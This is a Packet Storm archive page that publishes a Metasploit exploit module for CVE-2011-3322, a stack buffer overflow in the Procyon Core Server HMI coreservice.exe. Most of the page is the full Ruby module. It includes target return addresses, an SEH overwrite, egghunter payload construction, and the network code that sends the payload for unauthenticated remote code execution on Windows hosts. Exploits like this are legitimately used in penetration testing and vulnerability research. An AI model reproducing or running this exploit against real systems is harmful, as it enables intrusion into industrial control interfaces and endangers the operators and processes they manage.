what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Procyon Core Server HMI 1.13 Buffer Overflow

Procyon Core Server HMI 1.13 Buffer Overflow
Posted Sep 13, 2011
Authored by Knud Erik Hojgaard, mr_me | Site metasploit.com

This Metasploit module exploits a vulnerability in the coreservice.exe component of Proycon Core Server versions 1.13 and below. While processing a password, the application fails to do proper bounds checking before copying data into a small buffer on the stack. This causes a buffer overflow and allows it to overwrite a structured exception handling record on the stack, allowing for unauthenticated remote code execution. Also, after the payload exits, Coreservice.exe should automatically recover.

tags | exploit, remote, overflow, code execution
advisories | CVE-2011-3322, OSVDB-75371
SHA-256 | 6b02358e406abc5384ec6cc6943c4b62bf2bebc540cf1b912151572b9b5615e2

Procyon Core Server HMI 1.13 Buffer Overflow

Change Mirror Download
##
# $Id: procyon_core_server.rb 13724 2011-09-12 21:42:36Z swtornio $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::Egghunter
include Msf::Exploit::Remote::Tcp

def initialize(info={})
super(update_info(info,
'Name' => "Procyon Core Server HMI <= v1.13 Coreservice.exe Stack Buffer Overflow",
'Description' => %q{
This module exploits a vulnerability in the coreservice.exe component of Proycon
Core Server <= v1.13. While processing a password, the application
fails to do proper bounds checking before copying data into a small buffer on the stack.
This causes a buffer overflow and allows to overwrite a structured exception handling
record on the stack, allowing for unauthenticated remote code execution. Also, after the
payload exits, Coreservice.exe should automatically recover.
},
'License' => MSF_LICENSE,
'Version' => '$Revision: 13724 $',
'Author' =>
[
'Knud Højgaard <keh[at]nsense.dk>', # Initial discovery
'mr_me <steventhomasseeley[at]gmail.com>', # Initial discovery & poc/msf
],
'References' =>
[
['CVE', 'CVE-2011-3322'],
['OSVDB', '75371'],
['URL', 'http://www.uscert.gov/control_systems/pdf/ICSA-11-216-01.pdf'],
['URL', 'http://www.stratsec.net/Research/Advisories/Procyon-Core-Server-HMI-Remote-Stack-Overflow']
],
'Payload' =>
{
'BadChars' => "\x00\x0a\x0d",
},
'DefaultOptions' =>
{
'ExitFunction' => 'process',
},
'Platform' => 'win',
'Targets' =>
[

[
'Windows XP SP3 - No dep bypass',
{
'Ret' => 0x774699bf, # JMP ESP [user32.dll]
'Edx' => 0x1D847770, # 0x7712dec2 -> 0x00700040 RW [oleaut32.dll]
'Eax' => 0x01010106, # 0x7712dec2 -> 0x00700040 RW [oleaut32.dll]
'Offset' => 8
}
],
],
'Privileged' => true,
'DisclosureDate' => "Sep 08 2011",
'DefaultTarget' => 0))

register_options(
[
Opt::RPORT(23)
], self.class)
end

def check
connect
res = sock.get_once.chomp #This gives us string "----------------------------"
res = sock.get_once.chomp #This gives us the actual software version
disconnect

if res =~ /Core Command Interface V1\.(.*)2/
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end

def exploit

eggoptions =
{
:checksum => false,
:eggtag => 'ssec',
}

badchars = "\x00\x0a\x0d"
hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)

sploit = rand_text_alpha_upper(45)
sploit << [target['Edx']].pack('V')
sploit << [0x41414141].pack('V')
sploit << [target['Eax']].pack('V')
sploit << rand_text_alpha_upper(target['Offset'])
sploit << [target.ret].pack('V')
sploit << make_nops(10)
sploit << hunter
sploit << rand_text_alpha_upper(500)
sploit << egg
sploit << "\r\n"

connect
sock.get_once()
print_status("Sending request...")
sock.put(sploit)
handler()
disconnect

end

end
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close